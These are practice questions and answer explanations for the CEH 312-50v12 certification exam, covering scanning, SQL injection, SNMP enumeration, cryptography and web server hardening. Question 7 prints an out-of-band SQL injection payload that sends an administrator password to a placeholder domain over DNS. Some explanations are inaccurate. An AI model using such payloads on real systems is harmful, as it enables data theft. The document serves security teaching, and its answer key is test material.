EC-COUNCIL EC-COUNCIL Certifications 312-50V12 Questions & Answers

• Question 1:

  An ethical hacker is scanning a target network. They initiate a TCP connection by sending an SYN packet to a target machine and receiving a SYN/ACK packet in response. But instead of completing the three-way handshake with an ACK

  packet, they send an RST packet.

  What kind of scan is the ethical hacker likely performing and what is their goal?

  A. They are performing an SYN scan to stealthily identify open ports without fully establishing a connection

  B. They are performing a TCP connect scan to identify open ports on the target machine

  C. They are performing a vulnerability scan to identify any weaknesses in the target system

  D. They are performing a network scan to identify live hosts and their IP addresses

  Correct Answer: A

  The ethical hacker is likely performing an SYN scan to stealthily identify open ports without fully establishing a connection. An SYN scan, also known as a half-open scan or a stealth scan, is a type of port scanning technique that exploits the TCP three-way handshake process. The hacker sends an SYN packet to a target port and waits for a response. If the target responds with an SYN/ACK packet, it means the port is open and listening for connections. If the target responds with an RST packet, it means the port is closed and not accepting connections. However, instead of completing the handshake with an ACK packet, the hacker sends an RST packet to abort the connection. This way, the hacker avoids creating a full connection and logging an entry in the target's system, making the scan less detectable and intrusive. The hacker can repeat this process for different ports and identify which ones are open and potentially vulnerable to exploitation. The other options are not correct for the following reasons:

  B. They are performing a TCP connect scan to identify open ports on the target machine: This option is incorrect because a TCP connect scan involves establishing a full connection with the target port by completing the TCP three-way handshake. The hacker sends an SYN packet, receives an SYN/ACK packet, and then sends an ACK packet to finalize the connection. Then, the hacker terminates the connection with an RST or FIN packet. A TCP connect scan is more reliable and compatible than an SYN scan, but also more noisy and slow, as it creates more traffic and logs on the target system. C. They are performing a vulnerability scan to identify any weaknesses in the target system: This option is incorrect because a vulnerability scan is a broader and deeper process than a port scan. A vulnerability scan involves identifying and assessing the security flaws and risks in a system or network, such as missing patches, misconfigurations, outdated software, or weak passwords. A vulnerability scan may use port scanning as one of its techniques, but it also uses other methods, such as banner grabbing, service enumeration, or exploit testing. A vulnerability scan usually requires more time, resources, and permissions than a port scan. D. They are performing a network scan to identify live hosts and their IP addresses: This option is incorrect because a network scan is a different process than a port scan. A network scan involves discovering and mapping the devices and hosts connected to a network, such as routers, switches, servers, or workstations. A network scan may use ping, traceroute, or ARP requests to identify the IP addresses, MAC addresses, and hostnames of the live hosts. A network scan usually precedes a port scan, as it provides the target range and scope for the port scan. References:

  1: Port Scanning Techniques - an overview | ScienceDirect Topics

  2: nmap Host Discovery Techniques

  3: Vulnerability Scanning Tools | OWASP Foundation

  4: What Is Vulnerability Scanning? Types, Tools and Best Practices | Splunk

  5: Network Scanning - an overview | ScienceDirect Topics

  6: Network Scanning - Nmap

• Question 2:

  An organization has been experiencing intrusion attempts despite deploying an Intrusion Detection System (IDS) and Firewalls. As a Certified Ethical Hacker, you are asked to reinforce the intrusion detection process and recommend a better rule-based approach. The IDS uses Snort rules and the new recommended tool should be able to complement it. You suggest using YARA rules with an additional tool for rule generation. Which of the following tools would be the best choice for this purpose and why?

  A. AutoYara - Because it automates the generation of YARA rules from a set of malicious and benign files

  B. yarGen - Because it generates YARA rules from strings identified in malware files while removing strings that also appear in goodware files

  C. YaraRET - Because it helps in reverse engineering Trojans to generate YARA rules

  D. koodous - Because it combines social networking with antivirus signatures and YARA rules to detect malware

  Correct Answer: B

  YARA rules are a powerful way to detect and classify malware based on patterns, signatures, and behaviors. They can be used to complement Snort rules, which are mainly focused on network traffic analysis. However, writing YARA rules manually can be time-consuming and error-prone, especially when dealing with large and diverse malware samples. Therefore, using a tool that can automate or assist the generation of YARA rules can be very helpful for ethical hackers. Among the four options, yarGen is the best choice for this purpose, because it generates YARA rules from strings identified in malware files while removing strings that also appear in goodware files. This way, yarGen can reduce the false positives and increase the accuracy of the YARA rules. yarGen also supports various features, such as whitelisting, scoring, wildcards, and regular expressions, to improve the quality and efficiency of the YARA rules. The other options are not as suitable as yarGen for this purpose. AutoYara is a tool that automates the generation of YARA rules from a set of malicious and benign files, but it does not perform any filtering or optimization of the strings, which may result in noisy and ineffective YARA rules. YaraRET is a tool that helps in reverse engineering Trojans to generate YARA rules, but it is limited to a specific type of malware and requires manual intervention and analysis. koodous is a platform that combines social networking with antivirus signatures and YARA rules to detect malware, but it is not a tool for generating YARA rules, rather it is a tool for sharing and collaborating on YARA rules. References: yarGen - A Tool to Generate YARA Rules YARA Rules: The Basics Why master YARA: from routine to extreme threat hunting cases

• Question 3:

  A penetration tester was assigned to scan a large network range to find live hosts. The network is known for using strict TCP filtering rules on its firewall, which may obstruct common host discovery techniques. The tester needs a method that can bypass these firewall restrictions and accurately identify live systems. What host discovery technique should the tester use?

  A. UDP Ping Scan

  B. lCMP ECHO Ping Scan

  C. ICMP Timestamp Ping Scan

  D. TCP SYN Ping Scan

  Correct Answer: D

  The host discovery technique that the tester should use is TCP SYN Ping Scan. This technique sends a TCP SYN packet to a specified port on the target host and waits for a response. If the host responds with a TCP SYN/ACK packet, it means the host is alive and the port is open. If the host responds with a TCP RST packet, it means the host is alive but the port is closed. If the host does not respond at all, it means the host is either dead or filtered by a firewall. TCP SYN Ping Scan can bypass firewall restrictions because it mimics the initial stage of a TCP three-way handshake, which is a common and legitimate network activity. Therefore, most firewalls will allow TCP SYN packets to pass through and reach the target host, unless they are configured to block specific ports or IP addresses. TCP SYN Ping Scan can also accurately identify live systems because it does not rely on ICMP, which may be blocked or rate-limited by some firewalls or routers. The other options are not as effective or feasible as TCP SYN Ping Scan for the following reasons:

  A. UDP Ping Scan: This technique sends a UDP packet to a specified port on the target host and waits for a response. If the host responds with an ICMP Port Unreachable message, it means the host is alive but the port is closed. If the host does not respond at all, it means the host is either dead, the port is open, or the packet is filtered by a firewall. UDP Ping Scan may not bypass firewall restrictions because some firewalls may block or drop UDP packets, especially if they are sent to uncommon or reserved ports. UDP Ping Scan may also not accurately identify live systems because it cannot distinguish between open ports and filtered packets, and it may generate false positives or negatives due to packet loss or rate-limiting.

  B. ICMP ECHO Ping Scan: This technique sends an ICMP ECHO Request packet to the target host and waits for an ICMP ECHO Reply packet. If the host responds with an ICMP ECHO Reply packet, it means the host is alive. If the host does not respond at all, it means the host is either dead or filtered by a firewall. ICMP ECHO Ping Scan may not bypass firewall restrictions because some firewalls may block or drop ICMP packets, especially if they are sent to prevent ping sweeps or denial-of-service attacks. ICMP ECHO Ping Scan may also not accurately identify live systems because it may generate false positives or negatives due to packet loss or rate-limiting. C. ICMP Timestamp Ping Scan: This technique sends an ICMP Timestamp Request packet to the target host and waits for an ICMP Timestamp Reply packet. If the host responds with an ICMP Timestamp Reply packet, it means the host is alive. If the host does not respond at all, it means the host is either dead or filtered by a firewall. ICMP Timestamp Ping Scan may not bypass firewall restrictions because some firewalls may block or drop ICMP packets, especially if they are sent to prevent ping sweeps or denial-of-service attacks. ICMP Timestamp Ping Scan may also not accurately identify live systems because it may generate false positives or negatives due to packet loss or rate-limiting. References:

  1: Host Discovery in Nmap Network Scanning - GeeksforGeeks

  2: nmap Host Discovery Techniques

  3: TCP SYN Ping Scan - Nmap : Ping Sweep - an overview | ScienceDirect Topics : UDP Ping Scan - Nmap : UDP Ping Scan - an overview | ScienceDirect Topics : ICMP Ping Scan - Nmap : ICMP Ping Scan - an overview | ScienceDirect Topics

• Question 4:

  In the process of footprinting a target website, an ethical hacker utilized various tools to gather critical information. The hacker encountered a target site where standard web spiders were ineffective due to a specific file in its root directory. However, they managed to uncover all the files and web pages on the target site, monitoring the resulting incoming and outgoing traffic while browsing the website manually. What technique did the hacker likely employ to achieve this?

  A. Using Photon to retrieve archived URLs of the target website from archive.org

  B. Using the Netcraft tool to gather website information

  C. Examining HTML source code and cookies

  D. User-directed spidering with tools like Burp Suite and WebScarab

  Correct Answer: D

  User-directed spidering is a technique that allows the hacker to manually browse the target website and use a proxy or spider tool to capture and analyze the traffic. This way, the hacker can discover hidden or dynamic content that standard web spiders may miss due to a specific file in the root directory, such as robots.txt, that instructs them not to crawl certain pages or directories. User-directed spidering can also help the hacker to bypass authentication or authorization mechanisms, as well as identify vulnerabilities or sensitive information in the target website. User-directed spidering can be performed with tools like Burp Suite and WebScarab, which are web application security testing tools that can intercept, modify, and replay HTTP requests and responses, as well as perform various attacks and scans on the target website. The other options are not likely to achieve the same results as user-directed spidering. Using Photon to retrieve archived URLs of the target website from archive.org may provide some historical information about the website, but it may not reflect the current state or content of the website. Using the Netcraft tool to gather website information may provide some general information about the website, such as its IP address, domain name, server software, or hosting provider, but it may not reveal the specific files or web pages on the website. Examining HTML source code and cookies may provide some clues about the website's structure, functionality, or user preferences, but it may not expose the hidden or dynamic content that user-directed spidering can discover. References: User Directed Spidering with Burp Web Spidering - What Are Web Crawlers and How to Control Them Web Security: Recon Mapping the Application for Penetrating Web Applications -- 1

• Question 5:

  During an attempt to perform an SQL injection attack, a certified ethical hacker is focusing on the identification of database engine type by generating an ODBC error. The ethical hacker, after injecting various payloads, finds that the web application returns a standard, generic error message that does not reveal any detailed database information. Which of the following techniques would the hacker consider next to obtain useful information about the underlying database?

  A. Use the UNION operator to combine the result sets of two or more SELECT statements

  B. Attempt to compromise the system through OS-level command shell execution

  C. Try to insert a string value where a number is expected in the input field

  D. Utilize a blind injection technique that uses time delays or error signatures to extract information

  Correct Answer: D

  The technique that the hacker would consider next to obtain useful information about the underlying database is to utilize a blind injection technique that uses time delays or error signatures to extract information. A blind injection technique is a type of SQL injection technique that is used when the web application does not return any detailed error messages or data from the database, but only indicates whether the query was executed successfully or not. A blind injection technique relies on sending specially crafted SQL queries that cause a noticeable change in the behavior or response of the web application, such as a time delay or an error signature, which can then be used to infer information about the database. For example, the hacker could use the following methods: Time-based blind injection: This method involves injecting a SQL query that contains a time delay function, such as SLEEP() or WAITFOR DELAY, which pauses the execution of the query for a specified amount of time. The hacker can then measure the time difference between the normal and the delayed responses, and use it to determine whether the injected query was true or false. By using this method, the hacker can perform a binary search to guess the values of the data in the database, one bit at a time. Error-based blind injection: This method involves injecting a SQL query that contains a deliberate error, such as a division by zero, a type mismatch, or an invalid conversion, which causes the database to generate an error message. The hacker can then analyze the error message, which may contain useful information about the database, such as the version, the name, the structure, or the data. By using this method, the hacker can exploit the error handling mechanism of the database to extract information. The other options are not as suitable as option D for the following reasons:

  A. Use the UNION operator to combine the result sets of two or more SELECT statements: This option is not feasible because it requires the web application to return data from the database, which is not the case in this scenario. The UNION

  operator is a SQL operator that allows the hacker to append the results of another SELECT statement to the original query, and display them as part of the web page. This way, the hacker can retrieve data from other tables or columns that

  are not intended to be shown by the web application. However, this option does not work when the web application does not return any data or error messages from the database, as in this scenario.

  B. Attempt to compromise the system through OS-level command shell execution:

  This option is not relevant because it is not a SQL injection technique, but a post- exploitation technique. OS-level command shell execution is a method of gaining access to the underlying operating system of the web server, by injecting a

  SQL query that contains a system command, such as xp_cmdshell, exec, or shell_exec, which executes the command on the server. This way, the hacker can perform various actions on the server, such as uploading files, downloading files,

  or running programs. However, this option does not help to obtain information about the database, which is the goal of this scenario. C. Try to insert a string value where a number is expected in the input field: This option is not effective

  because it is a basic SQL injection technique that is used to detect SQL injection vulnerabilities, not to exploit them. Inserting a string value where a number is expected in the input field is a method of triggering a syntax error in the SQL

  query, which may reveal the structure or the content of the query in the error message. This way, the hacker can identify the vulnerable parameters and the type of the database. However, this option does not work when the web application

  does not return any detailed error messages from the database, as in this scenario.

  References:

  1: Blind SQL Injection - OWASP Foundation

  2: Blind SQL Injection - an overview | ScienceDirect Topics

  3: SQL Injection Union Attacks - OWASP Foundation

  4: OS Command Injection - OWASP Foundation

  5: SQL Injection - OWASP Foundation

• Question 6:

  An ethical hacker has been tasked with assessing the security of a major corporation's network. She suspects the network uses default SNMP community strings. To exploit this, she plans to extract valuable network information using SNMP enumeration. Which tool could best help her to get the information without directly modifying any parameters within the SNMP agent's management information base (MIB)?

  A. snmp-check (snmp_enum Module) to gather a wide array of information about the target

  B. Nmap, with a script to retrieve all running SNMP processes and associated ports

  C. Oputits, are mainly designed for device management and not SNMP enumeration

  D. SnmpWalk, with a command to change an OID to a different value

  Correct Answer: A

  snmp-check (snmp_enum Module) is the best tool to help the ethical hacker to get the information without directly modifying any parameters within the SNMP agent's MIB. snmp-check is a tool that allows the user to enumerate SNMP devices and extract information from them. It can gather a wide array of information about the target, such as system information, network interfaces, routing tables, ARP cache, installed software, running processes, TCP and UDP services, user accounts, and more. snmp-check can also perform brute force attacks to discover the SNMP community strings, which are the passwords used to access the SNMP agent. snmp-check is available as a standalone tool or as a module (snmp_enum) within the Metasploit framework. The other options are not as effective or suitable as snmp-check for the ethical hacker's task. Nmap is a network scanning and enumeration tool that can perform various types of scans and probes on the target. It can also run scripts to perform specific tasks, such as retrieving SNMP information. However, Nmap may not be able to gather as much information as snmp-check, and it may also trigger alerts or blocks from firewalls or intrusion detection systems. Oputils is a network monitoring and management toolset that can perform various functions, such as device discovery, configuration backup, bandwidth monitoring, IP address management, and more. However, Oputils is mainly designed for device management and not SNMP enumeration, and it may not be able to extract valuable network information from the SNMP agent. SnmpWalk is a tool that allows the user to retrieve the entire MIB tree of an SNMP agent by using SNMP GETNEXT requests. However, SnmpWalk is not suitable for the ethical hacker's task, because it requires the user to change an OID (object identifier) to a different value, which may modify the parameters within the SNMP agent's MIB and affect its functionality or security. References: snmp-check - The SNMP enumerator SNMP Enumeration | Ethical Hacking - GreyCampus SNMP Enumeration - GeeksforGeeks Nmap - the Network Mapper - Free Security Scanner OpUtils - Network Monitoring and Management Toolset SnmpWalk - SNMP MIB Browser

• Question 7:

  As an IT Security Analyst, you've been asked to review the security measures of an e-commerce website that relies on a SQL database for storing sensitive customer data. Recently, an anonymous tip has alerted you to a possible threat: a seasoned hacker who specializes in SQL Injection attacks may be targeting your system. The site already employs input validation measures to prevent basic injection attacks, and it blocks any user inputs containing suspicious patterns. However, this hacker is known to use advanced SQL Injection techniques. Given this situation, which of the following strategies would the hacker most likely adopt to bypass your security measures?

  A. The hacker could deploy an 'out-of-band' SQL Injection attack, extracting data via a different communication channel, such as DNS or HTTP requests

  B. The hacker may resort to a DDoS attack instead, attempting to crash the server and thus render the e commerce site unavailable

  C. The hacker may try to use SQL commands which are less known and less likely to be blocked by your system's security

  D. The hacker might employ a blind' SQL Injection attack, taking advantage of the application's true or false responses to extract data bit by bit

  Correct Answer: A

  An `out-of-band' SQL Injection attack is a type of SQL injection where the attacker does not receive a response from the attacked application on the same communication channel but instead is able to cause the application to send data to a remote endpoint that they control. This technique can be used to bypass input validation and pattern matching measures that are based on the application's responses. The attacker can use various SQL functions or commands that trigger DNS or HTTP requests, such as load_file, copy, dbms_ldap, etc., depending on the SQL server type. By concatenating the data they want to extract with a domain name they own, the attacker can receive the data via DNS or HTTP logs. For example, the attacker can inject the following SQL query to exfiltrate the password of the administrator user from a MySQL database: SELECT load_file(CONCAT('\\\\',(SELECT password FROM users WHERE username='administrator'),'.example.com\\\\test.txt')) This will cause the application to send a DNS request to the domain password.example.com, where password is the actual value of the administrator's password. References:

  1: Out-of-band SQL injection | Learn AppSec | Invicti

  2: Lab: Blind SQL injection with out-of-band interaction | Web Security Academy

  3: SQLi part 6: Out-of-band SQLi | Acunetix

• Question 8:

  As a cybersecurity consultant for SafePath Corp, you have been tasked with implementing a system for secure email communication. The key requirement is to ensure both confidentiality and non-repudiation. While considering various encryption methods, you are inclined towards using a combination of symmetric and asymmetric cryptography. However, you are unsure which cryptographic technique would best serve the purpose. Which of the following options would you choose to meet these requirements?

  A. Use symmetric encryption with the AES algorithm.

  B. Use the Diffie-Hellman protocol for key exchange and encryption.

  C. Apply asymmetric encryption with RSA and use the public key for encryption.

  D. Apply asymmetric encryption with RSA and use the private key for signing.

  Correct Answer: D

  To ensure both confidentiality and non-repudiation for secure email communication, you need to use a combination of symmetric and asymmetric cryptography. Symmetric encryption is a method of encrypting and decrypting data using the same secret key, which is faster and more efficient than asymmetric encryption. Asymmetric encryption is a method of encrypting and decrypting data using a pair of keys: a public key and a private key, which are mathematically related but not identical. Asymmetric encryption can provide authentication, integrity, and non-repudiation, as well as key distribution. The cryptographic technique that would best serve the purpose is to apply asymmetric encryption with RSA and use the private key for signing. RSA is a widely used algorithm for asymmetric encryption, which is based on the difficulty of factoring large numbers. RSA can be used to encrypt data, as well as to generate digital signatures, which are a way of proving the identity and authenticity of the sender and the integrity of the message. The steps to implement this technique are as follows1: Generate a pair of keys for each user: a public key and a private key. The public key can be shared with anyone, while the private key must be kept secret and protected by the user. When a user wants to send an email to another user, they first encrypt the email content with a symmetric key, such as AES, which is a strong and efficient algorithm for symmetric encryption. The symmetric key is then encrypted with the recipient's public key, using RSA. The encrypted email and the encrypted symmetric key are then sent to the recipient. The sender also generates a digital signature for the email, using their private key and a hash function, such as SHA-256, which is a secure and widely used algorithm for generating hashes. A hash function is a mathematical function that takes any input and produces a fixed-length output, called a hash or a digest, that uniquely represents the input. A digital signature is a hash of the email that is encrypted with the sender's private key, using RSA. The digital signature is then attached to the email and sent to the recipient. When the recipient receives the email, they first decrypt the symmetric key with their private key, using RSA. They then use the symmetric key to decrypt the email content, using AES. They also verify the digital signature by decrypting it with the sender's public key, using RSA, and comparing the resulting hash with the hash of the email, using the same hash function. If the hashes match, it means that the email is authentic and has not been tampered with. Using this technique, the email communication is secure because: The confidentiality of the email content is ensured by the symmetric encryption with AES, which is hard to break without knowing the symmetric key. The symmetric key is also protected by the asymmetric encryption with RSA, which is hard to break without knowing the recipient's private key. The non-repudiation of the email is ensured by the digital signature with RSA, which is hard to forge without knowing the sender's private key. The digital signature also provides authentication and integrity of the email, as it proves that the email was sent by the sender and has not been altered in transit. References: How to Encrypt Email (Gmail, Outlook, iOS, Yahoo, Android, AOL)

• Question 9:

  In your cybersecurity class, you are learning about common security risks associated with web servers. One topic that comes up is the risk posed by using default server settings. Why is using default settings on a web server considered a security risk, and what would be the best initial step to mitigate this risk?

  A. Default settings cause server malfunctions; simplify the settings

  B. Default settings allow unlimited login attempts; setup account lockout

  C. Default settings reveal server software type; change these settings

  D. Default settings enable auto-updates; disable and manually patch

  Correct Answer: C

  Using default settings on a web server is considered a security risk because it can reveal the server software type and version, which can help attackers identify potential vulnerabilities and launch targeted attacks. For example, if the default settings include a server signature that displays the name and version of the web server software, such as Apache 2.4.46, an attacker can search for known exploits or bugs that affect that specific software and version. Additionally, default settings may also include other insecure configurations, such as weak passwords, unnecessary services, or open ports, that can expose the web server to unauthorized access or compromise. The best initial step to mitigate this risk is to change the default settings to hide or obscure the server software type and version, as well as to disable or remove any unnecessary or insecure features. For example, to hide the server signature, one can modify the ServerTokens and ServerSignature directives in the Apache configuration file1. Alternatively, one can use a web application firewall or a reverse proxy to mask the server information from the client requests2. Changing the default settings can reduce the attack surface and make it harder for attackers to exploit the web server. References: How to Hide Apache Version Number and Other Sensitive Info How to hide server information from HTTP headers? - Stack Overflow

• Question 10:

  You have been hired as an intern at a start-up company. Your first task is to help set up a basic web server for the company's new website. The team leader has asked you to make sure the server is secure from common - threats. Based on your knowledge from studying for the CEH exam, which of the following actions should be your priority to secure the web server?

  A. Installing a web application firewall

  B. limiting the number of concurrent connections to the server

  C. Encrypting the company's website with SSL/TLS

  D. Regularly updating and patching the server software

  Correct Answer: D

  One of the most important actions to secure a web server from common threats is to regularly update and patch the server software. This includes the operating system, the web server software, the database software, and any other applications or frameworks that run on the server. Updating and patching the server software can fix known vulnerabilities, bugs, or errors that could be exploited by attackers to compromise the server or the website. Failing to update and patch the server software can expose the server to common attacks, such as SQL injection, cross-site scripting, remote code execution, denial-of-service, etc. Installing a web application firewall, limiting the number of concurrent connections to the server, and encrypting the company's website with SSL/TLS are also good practices to secure a web server, but they are not as critical as updating and patching the server software. A web application firewall can filter and block malicious requests, but it cannot prevent attacks that exploit unpatched vulnerabilities in the server software. Limiting the number of concurrent connections to the server can prevent overload and improve performance, but it cannot stop attackers from sending malicious requests or payloads. Encrypting the company's website with SSL/TLS can protect the data in transit between the server and the client, but it cannot protect the data at rest on the server or prevent attacks that target the server itself. Therefore, the priority action to secure a web server from common threats is to regularly update and patch the server software. References: Web Server Security- Beginner's Guide - Astra Security Blog Top 10 Web Server Security Best Practices | Liquid Web 21 Server Security Tips and Best Practices To Secure Your Server - phoenixNAP